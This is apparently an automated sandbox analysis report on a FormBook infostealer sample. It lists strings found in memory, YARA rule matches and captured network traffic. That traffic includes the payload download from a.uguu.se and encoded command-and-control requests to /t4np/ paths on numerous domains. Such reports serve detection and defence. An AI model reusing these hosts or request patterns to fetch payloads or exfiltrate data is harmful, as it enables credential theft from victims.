Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.net
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.net/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.netwww.33347.net
Source: explorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.babupaul.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.babupaul.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.babupaul.comwww.babupaul.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.comwww.brunaeleandro.com
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emprendizajesocial.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emprendizajesocial.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emprendizajesocial.comwww.emprendizajesocial.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.evelycosmetique.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.evelycosmetique.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.evelycosmetique.comwww.evelycosmetique.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.findmyoriginstory.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.findmyoriginstory.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.findmyoriginstory.comwww.findmyoriginstory.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funhood.life
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funhood.life/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funhood.lifewww.funhood.life
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.groupekoriolis.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.groupekoriolis.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.groupekoriolis.comwww.groupekoriolis.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.icste-conference.org
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.icste-conference.org/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.icste-conference.orgwww.icste-conference.org
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.com
Source: explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.com/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.comwww.madisoncountylincoln.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mejawajib.shop
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mejawajib.shop/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mejawajib.shopwww.mejawajib.shop
Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.metatv.app
Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.metatv.app/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.metatv.appwww.metatv.app
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mnsmanagmentsolutions.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mnsmanagmentsolutions.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.myprojoints.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.myprojoints.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.myprojoints.comwww.myprojoints.com
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pinterest.com/casarpontocom
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.comwww.rw-bau.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sistemadanetflix.site
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sistemadanetflix.site/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sistemadanetflix.sitewww.sistemadanetflix.site
Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a.uguu.se/fwvfviJb.dat
Source: SC_0017384.exe, Lvdnyvcvr.exe.0.dr String found in binary or memory: https://a.uguu.se/fwvfviJb.dat=
Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a.uguu.se4Dp
Source: M61Ae5o9b.8.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ajuda.casar.com
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c
Source: M61Ae5o9b.8.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: M61Ae5o9b.8.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: M61Ae5o9b.8.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: M61Ae5o9b.8.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://embed.typeform.com/embed.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://plus.google.com/
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_see5bad
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/organizacao/
Source: M61Ae5o9b.8.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/casarpontocom
Source: unknown HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
Source: unknown DNS traffic detected: queries for: a.uguu.se
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: SC_0017384.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
